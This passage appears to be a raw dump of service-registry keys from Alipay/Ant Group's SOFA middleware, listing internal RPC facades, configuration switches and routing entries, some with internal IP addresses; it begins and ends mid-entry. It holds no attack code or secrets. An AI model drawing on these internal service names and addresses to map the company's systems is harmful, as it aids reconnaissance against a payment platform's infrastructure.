#@#SOFA_ROUTER","com.alipay.gmcore.common.service.facade.merchant.PartnerIdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-coffeepaytwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bcm.common.service.facade.SymmetricKeyOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.TaskInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DATACLASSIFICATION#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insuserinsight.facade.usergrowth.BehaviourAnalysisMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskConfigQueryService:1.0:processmng_TaskConfigQueryService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.21.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csrobot.service.facade.mng.api.DumperMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MESHYFBI#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.OpenOperatorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.GqcRecordGradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.247.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.chair:name=com.alipay.chair.BucSession.cookieName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antscheduler.facade.IChunkItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mdatasync.common.service.facade.ReportEngineQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbactivityprod.common.service.facade.api.EnergyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.permlimit.nearshare.facade.CalcModelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","aliminiabilityprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.26.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:securitysimulate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.duty.HealthExclusionDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.fininfo.biz.service.impl.drm.GrayCompatibilityConfigDrm.encryDbSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.airbops.biz.airmng.service.drm.AirmngDrmSwitch.removeMainAccountList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:gfacceptance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.134.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fppolicy.service.widetable.WidetableServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ifundcontrolmodel.service.facade.api.BankAccountOrderFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.ConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.frgcenter.common.service.facade.api.CheckRulesServiceFacade:1.0:rpcCheckRulesServiceFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:wealthgoldtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:unitradeadapter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bumng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.18.118.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcop_task_executor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.complainmessage.impl.FraudFeedBackWordingSwitchImpl.punishNameLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.SlaConfigResource.batchAgentDispatchCountCluster,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linke.aci.core.facade.ACIWarningService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mobilecodec@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdecision.service.bizmanager.PcreditSceneBizManagerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyModifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zskynet.facade.alarmcheck.AppGeneralAnalyseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoquality.common.service.facade.miniopen.SlmYunTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenterprod.integration.aliyun.DgClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebEteUserLimitQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apopscompose.common.service.facade.processinstance.ProcessInstanceNodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.itransferprod.service.facade.api.TopupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.lifemng.facade.autoaccess.EbppBatchTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.core.service.drm.AstcIgnoredDailyDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.EbppOpenApiServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cssocial.common.service.facade.YqSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.miniplan.MiniNamelistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.prodmng.common.service.integration.cif.impl.CifQuerySwitchDrm.switchToFinanceProd,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.biz.shared.repository.CreditorsRightTransferRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:yuemaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.116.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.CreditToolQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_LIFEMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openhome.facade.pam.PamResourcePermissionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.loancore.friendloan.service.facade.api.FlcAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.task.CensorTaskRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securityjs:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:memberprodAuditCallbackServiceV2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoinsprod.common.service.facade.AutoInsLiability4MngFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseamng.common.service.facade.CheckMerchantInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.ide.common.facade.quota.spi.SystemResourceQuotaSpi:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundboss.common.service.facade.risk.FundRiskMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.selfopact.SelfOpActDeliveryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ADEXCHANGE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.warehouse.vdps.facade.VdpsConsumeSrcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.123.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promokernel.common.manage.facade.api.AppletManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fundAmountFreeze_syscall@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.infosectask:name=com.alipay.infosec.core.basic.common.DingMsgResource.publishDingToken,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityidentify.service.otp.OtpInitDeviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:accorderexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeapFreezeOrderQueryFacade:1.0:tradequeryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfbill@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkwirelessdataportal.common.service.panda.SceneAuthManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.167.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:dcepAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfaccenter.facade.api.consolidation.ConsolidationAcceptanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.manager.api.OperationPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.DCDataSyncFacade:1.0:uemprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.quotation.StockQuotationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.control.api.AccountBookQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.platform.BizTypeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.OverseaCertifyActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.ClearingRuleCacheDRM.useMD5,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.event.MerchantEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.promokernel.common.manage.facade.api.PrizeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.transferprod.common.service.facade.api.GroupFundsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.creditacceptance.common.service.facade.CreditSignRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.task.TaskControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.clientpg.MobilePgTaskConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsccalipay.jiebei.facade.service.JieBeiPlatformCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:porder@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.logClientError,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbmaterialcenter.common.service.facade.api.material.MaterialManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:yuyancore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.game.GameEngineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.code.editor.common.facade.assist.CodeAssistService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudbox.facade.api.workorder.SubmitWorkOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.228.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservindustryprod.common.service.facade.alsc.uploadmng.FileMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:newLiquadationBillStatusModifyCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.operator.AloneOperatorService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdiscount.common.service.facade.api.DiscountDecisionConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.182.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.dcommservice.common.service.facade.UniDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ngfe:name=com.alipay.ufe.connector.base.drm.CommonConnectorDrm.tbaseDegradeAppTairNameStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.ioteds.bizunit.api.EdsBizUnitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mdistinguish.common.service.facade.FalconArRedRZoneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openaccess.common.quickaccess.facade.service.proxy.FinatpQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.agreement.api.UserAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.ucm.masterdata.InstTypeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.fundYieldIgnoreScene,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.disableSchemeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ANTICRAWLER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbillingcore.common.service.facade.ArMonthlyBillSynFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileapp.common.service.facade.getconfig.GetSdkConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.baobei.repo.BBContractRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CUSTVIEW#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.http.AppTemplateHttpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.DispositionSchemeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.assetflux.service.assettool.spi.AssetToolDebitService:1.0:ivouchercore-debit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.protocol-https:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.biz.service.impl.geabase.updateservice.GeaBaseUpdateClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexprodWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.prodcoreTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finannafccore.facade.api.AnnaQueryProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.TaskSwitchResourceImpl.taskDispatch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkoyzbroker.spi.publish.DataDeployFacade:1.0:BROKER_SPI_DATA_DEPLOY@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.content.external.NewsFlashExternalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.bumng_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_FAMILYCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmemberprod.merchant.service.facade.MemberTemplateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fbepservice.facade.FengbaoMscService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.core.service.dispatch.serverinfo.AppInfoCrawlCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:zimtmsvcprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.blood.ZbdmColumnBloodFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antchaos.facade.api.ChaosRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.0.144.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.framodelcore.common.service.facade.api.PhysicTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.push.MsgPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.custcpt.facade.PotentialCustomerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobilecodec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:govdataprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mfinquotationprod.common.service.facade.api.SecuDefValFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.DailycutFailMailTimeThresholdDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:vouchercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_unique_goods_notify_merchant_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_MQ_ZPROXY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.13.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.easytest.agent.facade.SchedulerTriggerFacade:1.0:ifxtrade_scedulerTriggerFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.44.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.facade.partner.PartnerSecurityFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.hyperion.service.CompanyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tab.common.service.facade.GrayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.plan.PriorScheduleRatioQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbprizeprod.common.service.facade.rpc.PrizeSendLogInfoQueryRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:hainaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-TEST002#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_4010#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchorder.ordercenter.facade.service.OrderDeliverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.mservice.digital.rpc.MtestRpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:morderprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insdataprod.common.service.facade.hospital.api.InsHospitalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.client.api.SignatureClientApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_LINKU#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.sp.business.BusinessQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.selleradmit.AgdsccSellerAdmitPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.mobilegeocoding.common.service.client.drm.BizClientDrmServiceImpl.dataLoadMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxiancore.common.service.InsPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.cache.PscConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:remindOpenLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:pagemock-disable-pluginjs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:socialportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.arc.job.processor.core.service.mng.LogicalClusterManagement:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.162.254#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ucdpmng.facade.VenueBatchDataResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.growthplus.touchpoint.TouchPointApprovalProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowProcessorStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdspcore.common.service.facade.api.DispositionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.common.service.facade.api.HoldEditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.price.PriceCalculateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.facade.api.AccenterReconMappingValueManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.AssistantAntdsrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_4010_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.cleanAllCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.biz.activity.service.PubliccoreManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.relationdiscover.GraphRelationDiscoverService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.FinfoServiceSignatureService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipassprod.service.facade.api.AlipassCumulateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.goldetfprod.common.service.facade.GoldAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-mcaplatformunit-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.mif.common.service.facade.category.FrontCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.core.service.project.ProjectService:1.0@DEFAULT#@#DEFAU